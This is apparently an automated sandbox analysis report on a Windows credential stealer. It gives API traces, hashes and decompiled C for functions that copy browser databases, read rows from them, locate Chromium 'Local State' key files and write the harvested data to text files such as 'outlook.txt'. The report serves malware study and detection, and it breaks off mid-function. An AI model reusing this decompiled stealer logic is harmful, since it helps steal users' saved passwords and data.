                                                                                                                              0x0041f276
                                                                                                                              0x0041f27a
                                                                                                                              0x0041f280
                                                                                                                              0x0041f288
                                                                                                                              0x0041f289
                                                                                                                              0x0041f28e
                                                                                                                              0x0041f291
                                                                                                                              0x0041f2a3
                                                                                                                              0x0041f2a6
                                                                                                                              0x0041f2a9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041f2c1
                                                                                                                              0x0041f2c2
                                                                                                                              0x0041f2ca
                                                                                                                              0x0041f2cb
                                                                                                                              0x0041f2d0
                                                                                                                              0x0041f2e2
                                                                                                                              0x0041f2fa
                                                                                                                              0x0041f2fb
                                                                                                                              0x0041f303
                                                                                                                              0x0041f304
                                                                                                                              0x0041f309
                                                                                                                              0x0041f309
                                                                                                                              0x0041f2a0
                                                                                                                              0x0041f2a0
                                                                                                                              0x0041f2a3
                                                                                                                              0x0041f30e
                                                                                                                              0x0041f311
                                                                                                                              0x0041f312
                                                                                                                              0x0041f325

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0041EF60: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0041EFD1
                                                                                                                                • Part of subcall function 0041EF60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F0D2
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • _fprintf.LIBCMT ref: 0041F289
                                                                                                                              • _fprintf.LIBCMT ref: 0041F2CB
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              • _fprintf.LIBCMT ref: 0041F304
                                                                                                                              • task.LIBCPMTD ref: 0041F31D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$HeapOpenProcess__fsopen__ftbuf__lock_file__output_l__stbuftask
                                                                                                                              • String ID: %s$%s: $outlook.txt
                                                                                                                              • API String ID: 4112224197-832069077
                                                                                                                              • Opcode ID: 173c371cda97e8d7d48480c82e11604cce746cfe3e80d4a81e8dfd7928785786
                                                                                                                              • Instruction ID: 555e29c1499d1913ce3ba631964d1994d4a3664e14a7d307d03251650a9181d7
                                                                                                                              • Opcode Fuzzy Hash: 173c371cda97e8d7d48480c82e11604cce746cfe3e80d4a81e8dfd7928785786
                                                                                                                              • Instruction Fuzzy Hash: 30215EB5E10218ABDF04EBE1DC42AEE7775EB58304F50412FE90577281DA3CA985CBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041DA80, Relevance: 12.2, APIs: 8, Instructions: 157filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 21%
                                                                                                                              			E0041DA80(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v316;
				char _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				void* __ebp;
				signed int _t44;
				void* _t56;
				int _t58;
				void* _t61;
				intOrPtr _t64;
				void* _t66;
				void* _t74;
				intOrPtr _t79;
				void* _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr _t92;
				CHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t117;
				void* _t120;

				_t111 = __esi;
				_t110 = __edi;
				_t83 = __ebx;
				_t44 =  *0x4301f4; // 0xe687535
				_v8 = _t44 ^ _t112;
				GetCurrentDirectoryA(0x104,  &_v580);
				_t84 =  *0x432400; // 0x2336800
				 *0x4328c4( &_v580, _t84);
				CopyFileA(_a4,  &_v580, 1); // executed
				E004091C0( &_v316, 0, 0x104);
				_t102 =  *0x4323e8; // 0x2336b78
				wsprintfA( &_v316, _t102, _a12, _a8);
				_t87 =  *0x4320b8; // 0x2336f50
				_v44 = _t87;
				_t103 =  &_v40;
				_t56 =  *0x432750( &_v580,  &_v40); // executed
				_t116 = _t113 + 0x24;
				if(_t56 == 0) {
					_t61 =  *0x432700(_v40, _v44, 0xffffffff,  &_v48, 0); // executed
					_t117 = _t116 + 0x14;
					if(_t61 == 0) {
						_t92 =  *0x4321d0; // 0x23310d8
						_t105 =  &_v316;
						_t64 = E004055AB( &_v316, _t92); // executed
						_t117 = _t117 + 8;
						_v584 = _t64;
						if(_v584 != 0) {
							while(1) {
								_t66 =  *0x432720(_v48); // executed
								_t120 = _t117 + 4;
								_t131 = _t66 - 0x64;
								if(_t66 != 0x64) {
									break;
								}
								_v592 =  *0x43273c(_v48, 0);
								_v588 =  *0x43273c(_v48, 1);
								_v596 =  *0x43273c(_v48, 2);
								_t74 =  *0x43272c(_v48, 3, _a16, _a20);
								_v600 = E0041D730(_t83,  &_v36,  *0x432734(), _v48, 3, _t74);
								_push(_v596);
								_push(_v588);
								_push(_v592);
								_push(E00401330(_v600));
								_t79 =  *0x432138; // 0x2336430
								_push(_t79);
								_push(_v584);
								E004055C2(_t83, _t110, _t111, _t131);
								E004012D0( &_v36);
								_push("\n\n");
								_t105 = _v584;
								_push(_v584);
								E004055C2(_t83, _t110, _t111, _t131);
								_t117 = _t120 + 0x5c;
							}
							_push(_v584); // executed
							E00405EA3(_t83, _t105, _t110, _t111, __eflags); // executed
							_t117 = _t120 + 4;
						}
					}
					 *0x432724(_v48);
					_t103 = _v40;
					 *0x432754(_v40);
				}
				_t58 = DeleteFileA( &_v580); // executed
				__eflags = _v8 ^ _t112;
				return E00404354(_t58, _t83, _v8 ^ _t112, _t103, _t110, _t111);
			}




































                                                                                                                              0x0041da80
                                                                                                                              0x0041da80
                                                                                                                              0x0041da80
                                                                                                                              0x0041da89
                                                                                                                              0x0041da90
                                                                                                                              0x0041da9f
                                                                                                                              0x0041daa5
                                                                                                                              0x0041dab3
                                                                                                                              0x0041dac6
                                                                                                                              0x0041dada
                                                                                                                              0x0041daea
                                                                                                                              0x0041daf8
                                                                                                                              0x0041db01
                                                                                                                              0x0041db07
                                                                                                                              0x0041db0a
                                                                                                                              0x0041db15
                                                                                                                              0x0041db1b
                                                                                                                              0x0041db20
                                                                                                                              0x0041db36
                                                                                                                              0x0041db3c
                                                                                                                              0x0041db41
                                                                                                                              0x0041db47
                                                                                                                              0x0041db4e
                                                                                                                              0x0041db55
                                                                                                                              0x0041db5a
                                                                                                                              0x0041db5d
                                                                                                                              0x0041db6a
                                                                                                                              0x0041db70
                                                                                                                              0x0041db74
                                                                                                                              0x0041db7a
                                                                                                                              0x0041db7d
                                                                                                                              0x0041db80
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041db95
                                                                                                                              0x0041dbaa
                                                                                                                              0x0041dbbf
                                                                                                                              0x0041dbd3
                                                                                                                              0x0041dbf9
                                                                                                                              0x0041dc05
                                                                                                                              0x0041dc0c
                                                                                                                              0x0041dc13
                                                                                                                              0x0041dc1f
                                                                                                                              0x0041dc20
                                                                                                                              0x0041dc25
                                                                                                                              0x0041dc2c
                                                                                                                              0x0041dc2d
                                                                                                                              0x0041dc38
                                                                                                                              0x0041dc3d
                                                                                                                              0x0041dc42
                                                                                                                              0x0041dc48
                                                                                                                              0x0041dc49
                                                                                                                              0x0041dc4e
                                                                                                                              0x0041dc4e
                                                                                                                              0x0041dc5c
                                                                                                                              0x0041dc5d
                                                                                                                              0x0041dc62
                                                                                                                              0x0041dc62
                                                                                                                              0x0041db6a
                                                                                                                              0x0041dc69
                                                                                                                              0x0041dc72
                                                                                                                              0x0041dc76
                                                                                                                              0x0041dc7c
                                                                                                                              0x0041dc86
                                                                                                                              0x0041dc8f
                                                                                                                              0x0041dc99

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041DA9F
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041DAB3
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041DAC6
                                                                                                                              • _memset.LIBCMT ref: 0041DADA
                                                                                                                              • wsprintfA.USER32 ref: 0041DAF8
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041DC86
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                                • Part of subcall function 0041D730: _memset.LIBCMT ref: 0041D7A4
                                                                                                                                • Part of subcall function 0041D730: LocalAlloc.KERNEL32(00000040,?), ref: 0041D7F3
                                                                                                                              • _fprintf.LIBCMT ref: 0041DC2D
                                                                                                                              • _fprintf.LIBCMT ref: 0041DC49
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf_memset$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuflstrcatwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1106594688-0
                                                                                                                              • Opcode ID: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
                                                                                                                              • Instruction ID: b7e754361677a1f3ef2fd7e3f9e65c1c63799f8599065462e7f6851c09d7b54f
                                                                                                                              • Opcode Fuzzy Hash: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
                                                                                                                              • Instruction Fuzzy Hash: A35184B1D00204ABCB14EFA4DD89FDE7378FB48305F0445A9F609A7290D775AA84CFA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B7B0, Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 24%
                                                                                                                              			E0041B7B0(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				void* __ebp;
				signed int _t31;
				void* _t43;
				int _t44;
				void* _t47;
				intOrPtr _t51;
				void* _t53;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t73;
				CHAR* _t76;
				void* _t81;
				void* _t82;
				signed int _t83;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t91;

				_t82 = __esi;
				_t81 = __edi;
				_t61 = __ebx;
				_t31 =  *0x4301f4; // 0xe687535
				_v20 = _t31 ^ _t83;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t62 =  *0x432400; // 0x2336800
				 *0x4328c4( &_v548, _t62);
				CopyFileA(_a4,  &_v548, 1); // executed
				E004091C0( &_v284, 0, 0x104);
				_t76 =  *0x4321a8; // 0x2336150
				wsprintfA( &_v284, _t76, _a12, _a8);
				_t65 =  *0x4325f0; // 0x2336fb8
				_v12 = _t65;
				_t77 =  &_v8;
				_t43 =  *0x432750( &_v548,  &_v8); // executed
				_t87 = _t84 + 0x24;
				if(_t43 == 0) {
					_t47 =  *0x432700(_v8, _v12, 0xffffffff,  &_v16, 0); // executed
					_t88 = _t87 + 0x14;
					if(_t47 == 0) {
						_t70 =  *0x4321d0; // 0x23310d8
						_t79 =  &_v284;
						_t51 = E004055AB( &_v284, _t70); // executed
						_t88 = _t88 + 8;
						_v552 = _t51;
						if(_v552 != 0) {
							while(1) {
								_t53 =  *0x432720(_v16);
								_t91 = _t88 + 4;
								_t98 = _t53 - 0x64;
								if(_t53 != 0x64) {
									break;
								}
								_v556 =  *0x43273c(_v16, 0);
								_push( *0x43273c(_v16, 1));
								_push(_v556);
								_t73 =  *0x4324f8; // 0x2336700
								_push(_t73);
								_t79 = _v552;
								_push(_v552);
								E004055C2(_t61, _t81, _t82, _t98);
								_push("\n");
								_push(_v552);
								E004055C2(_t61, _t81, _t82, _t98);
								_t88 = _t91 + 0x28;
							}
							_push(_v552); // executed
							E00405EA3(_t61, _t79, _t81, _t82, __eflags); // executed
							_t88 = _t91 + 4;
						}
					}
					_t77 = _v16;
					 *0x432724(_v16);
					 *0x432754(_v8);
				}
				_t44 = DeleteFileA( &_v548); // executed
				__eflags = _v20 ^ _t83;
				return E00404354(_t44, _t61, _v20 ^ _t83, _t77, _t81, _t82);
			}































                                                                                                                              0x0041b7b0
                                                                                                                              0x0041b7b0
                                                                                                                              0x0041b7b0
                                                                                                                              0x0041b7b9
                                                                                                                              0x0041b7c0
                                                                                                                              0x0041b7cf
                                                                                                                              0x0041b7d5
                                                                                                                              0x0041b7e3
                                                                                                                              0x0041b7f6
                                                                                                                              0x0041b80a
                                                                                                                              0x0041b81a
                                                                                                                              0x0041b828
                                                                                                                              0x0041b831
                                                                                                                              0x0041b837
                                                                                                                              0x0041b83a
                                                                                                                              0x0041b845
                                                                                                                              0x0041b84b
                                                                                                                              0x0041b850
                                                                                                                              0x0041b866
                                                                                                                              0x0041b86c
                                                                                                                              0x0041b871
                                                                                                                              0x0041b877
                                                                                                                              0x0041b87e
                                                                                                                              0x0041b885
                                                                                                                              0x0041b88a
                                                                                                                              0x0041b88d
                                                                                                                              0x0041b89a
                                                                                                                              0x0041b89c
                                                                                                                              0x0041b8a0
                                                                                                                              0x0041b8a6
                                                                                                                              0x0041b8a9
                                                                                                                              0x0041b8ac
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041b8bd
                                                                                                                              0x0041b8d2
                                                                                                                              0x0041b8d9
                                                                                                                              0x0041b8da
                                                                                                                              0x0041b8e0
                                                                                                                              0x0041b8e1
                                                                                                                              0x0041b8e7
                                                                                                                              0x0041b8e8
                                                                                                                              0x0041b8f0
                                                                                                                              0x0041b8fb
                                                                                                                              0x0041b8fc
                                                                                                                              0x0041b901
                                                                                                                              0x0041b901
                                                                                                                              0x0041b90c
                                                                                                                              0x0041b90d
                                                                                                                              0x0041b912
                                                                                                                              0x0041b912
                                                                                                                              0x0041b89a
                                                                                                                              0x0041b915
                                                                                                                              0x0041b919
                                                                                                                              0x0041b926
                                                                                                                              0x0041b92c
                                                                                                                              0x0041b936
                                                                                                                              0x0041b93f
                                                                                                                              0x0041b949

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B7CF
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041B7E3
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041B7F6
                                                                                                                              • _memset.LIBCMT ref: 0041B80A
                                                                                                                              • wsprintfA.USER32 ref: 0041B828
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041B936
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • _fprintf.LIBCMT ref: 0041B8E8
                                                                                                                              • _fprintf.LIBCMT ref: 0041B8FC
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 556801341-0
                                                                                                                              • Opcode ID: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
                                                                                                                              • Instruction ID: e8761a1d6595843f783b96905d13a4169cfc93f9c27205834795f2e7f4044694
                                                                                                                              • Opcode Fuzzy Hash: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
                                                                                                                              • Instruction Fuzzy Hash: 484172B5D00208BBCB14EFA4ED89EEE7378FB48304F0445A9F60697281D775AA54CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E990, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 64%
                                                                                                                              			E0041E990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0xe687535
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1a); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8);
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429447,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}
















                                                                                                                              0x0041e990
                                                                                                                              0x0041e990
                                                                                                                              0x0041e990
                                                                                                                              0x0041e999
                                                                                                                              0x0041e9a0
                                                                                                                              0x0041e9a3
                                                                                                                              0x0041e9aa
                                                                                                                              0x0041e9bf
                                                                                                                              0x0041e9d0
                                                                                                                              0x0041e9e3
                                                                                                                              0x0041e9f7
                                                                                                                              0x0041ea0d
                                                                                                                              0x0041ea1f
                                                                                                                              0x0041ea2c
                                                                                                                              0x0041ea31
                                                                                                                              0x0041ea36
                                                                                                                              0x0041ea47
                                                                                                                              0x0041ea4c
                                                                                                                              0x0041ea51
                                                                                                                              0x0041ea5b
                                                                                                                              0x0041ea60
                                                                                                                              0x0041ea60
                                                                                                                              0x0041ea51
                                                                                                                              0x0041ea7b
                                                                                                                              0x0041eaa0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041E9BF
                                                                                                                                • Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D
                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041E9E3
                                                                                                                              • _memset.LIBCMT ref: 0041E9F7
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041EA0D
                                                                                                                              • lstrcat.KERNEL32(?,\Local State), ref: 0041EA1F
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$AttributesFileFolderPath
                                                                                                                              • String ID: \Local State
                                                                                                                              • API String ID: 3917447719-679424310
                                                                                                                              • Opcode ID: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
                                                                                                                              • Instruction ID: aabe7e0d757943bf1a559953441f035433ab2aea8e542140c35c9f68380cff5b
                                                                                                                              • Opcode Fuzzy Hash: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
                                                                                                                              • Instruction Fuzzy Hash: 303178F6D0010CBBCB14EBD1EC86FDE7378AF58304F444199B605A6182EA749788CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EAB0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 64%
                                                                                                                              			E0041EAB0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0xe687535
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1c); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8); // executed
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429446,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}
















                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab0
                                                                                                                              0x0041eab9
                                                                                                                              0x0041eac0
                                                                                                                              0x0041eac3
                                                                                                                              0x0041eaca
                                                                                                                              0x0041eadf
                                                                                                                              0x0041eaf0
                                                                                                                              0x0041eb03
                                                                                                                              0x0041eb17
                                                                                                                              0x0041eb2d
                                                                                                                              0x0041eb3f
                                                                                                                              0x0041eb4c
                                                                                                                              0x0041eb51
                                                                                                                              0x0041eb56
                                                                                                                              0x0041eb67
                                                                                                                              0x0041eb6c
                                                                                                                              0x0041eb71
                                                                                                                              0x0041eb7b
                                                                                                                              0x0041eb80
                                                                                                                              0x0041eb80
                                                                                                                              0x0041eb71
                                                                                                                              0x0041eb9b
                                                                                                                              0x0041ebc0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041EADF
                                                                                                                                • Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D
                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041EB03
                                                                                                                              • _memset.LIBCMT ref: 0041EB17
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041EB2D
                                                                                                                              • lstrcat.KERNEL32(?,\Local State), ref: 0041EB3F
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$AttributesFileFolderPath
                                                                                                                              • String ID: \Local State
                                                                                                                              • API String ID: 3917447719-679424310
                                                                                                                              • Opcode ID: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
                                                                                                                              • Instruction ID: b0ab83bab44515073897f62d2fa019738ac76b2c10f22035d5c686078b2382ec
                                                                                                                              • Opcode Fuzzy Hash: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
                                                                                                                              • Instruction Fuzzy Hash: 393178F6D4010CBBCB14EBD1EC86FDE7378AB58304F444199B60566182EA749788CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B340, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 53%
                                                                                                                              			E0041B340(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				unsigned int _v280;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v348;
				struct _MEMORYSTATUS _v380;
				signed int _t29;
				struct _MEMORYSTATUSEX* _t40;
				void* _t42;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t54 = __edi;
				_t42 = __ebx;
				_t29 =  *0x4301f4; // 0xe687535
				_v12 = _t29 ^ _t56;
				_v8 =  *0x43280c( *0x432898( *0x43243c,  *0x4320dc));
				if(_v8 != 0) {
					E004091C0( &_v348, 0, 0x40);
					_t57 = _t57 + 0xc;
					_v348 = 0x40;
					_t40 =  &_v348;
					GlobalMemoryStatusEx(_t40);
					if(_t40 != 1) {
						_v8 = 0;
					} else {
						_v280 = E0040E2D0(_v340, _v336, 0x100000, 0);
					}
				}
				if(_v8 == 0) {
					_v380.dwLength = 0;
					_v380.dwMemoryLoad = 0;
					_v380.dwTotalPhys = 0;
					_v380.dwAvailPhys = 0;
					_v380.dwTotalPageFile = 0;
					_v380.dwAvailPageFile = 0;
					_v380.dwTotalVirtual = 0;
					_v380.dwAvailVirtual = 0;
					_v380.dwLength = 0x20;
					GlobalMemoryStatus( &_v380);
					_v280 = _v380.dwTotalPhys >> 0x14;
				}
				 *0x432768( *0x4321d4, _v280);
				return E00404354( &_v276, _t42, _v12 ^ _t56,  &_v276, _t54, _t55,  &_v276);
			}


















                                                                                                                              0x0041b340
                                                                                                                              0x0041b340
                                                                                                                              0x0041b340
                                                                                                                              0x0041b349
                                                                                                                              0x0041b350
                                                                                                                              0x0041b36d
                                                                                                                              0x0041b374
                                                                                                                              0x0041b381
                                                                                                                              0x0041b386
                                                                                                                              0x0041b389
                                                                                                                              0x0041b393
                                                                                                                              0x0041b39a
                                                                                                                              0x0041b3a0
                                                                                                                              0x0041b3c4
                                                                                                                              0x0041b3a2
                                                                                                                              0x0041b3bc
                                                                                                                              0x0041b3bc
                                                                                                                              0x0041b3a0
                                                                                                                              0x0041b3cf
                                                                                                                              0x0041b3d3
                                                                                                                              0x0041b3d9
                                                                                                                              0x0041b3df
                                                                                                                              0x0041b3e5
                                                                                                                              0x0041b3eb
                                                                                                                              0x0041b3f1
                                                                                                                              0x0041b3f7
                                                                                                                              0x0041b3fd
                                                                                                                              0x0041b403
                                                                                                                              0x0041b414
                                                                                                                              0x0041b423
                                                                                                                              0x0041b423
                                                                                                                              0x0041b43e
                                                                                                                              0x0041b45a

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemoryStatus$__aulldiv_memset
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 2816718150-1077428164
                                                                                                                              • Opcode ID: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
                                                                                                                              • Instruction ID: db4982e13e79d3db6745d5f0cfa83d5bf5defc0fd26a34047e2e0df123a5a917
                                                                                                                              • Opcode Fuzzy Hash: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
                                                                                                                              • Instruction Fuzzy Hash: 2731E3B0D04218EFCB64DFA4DD49BDEB7B8AB48304F4045EAE60DA6280EB745A84CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AD33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55registrystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E0041AD33() {
				void* _t53;
				long _t56;
				long _t60;
				long _t62;
				long _t69;
				void* _t78;
				char* _t87;
				char* _t94;
				void* _t107;
				void* _t108;
				signed int _t109;

				L0:
				while(1) {
					L0:
					 *(_t109 - 0x31960) =  *(_t109 - 0x31960) + 1;
					if( *(_t109 - 0x814) != 0) {
						break;
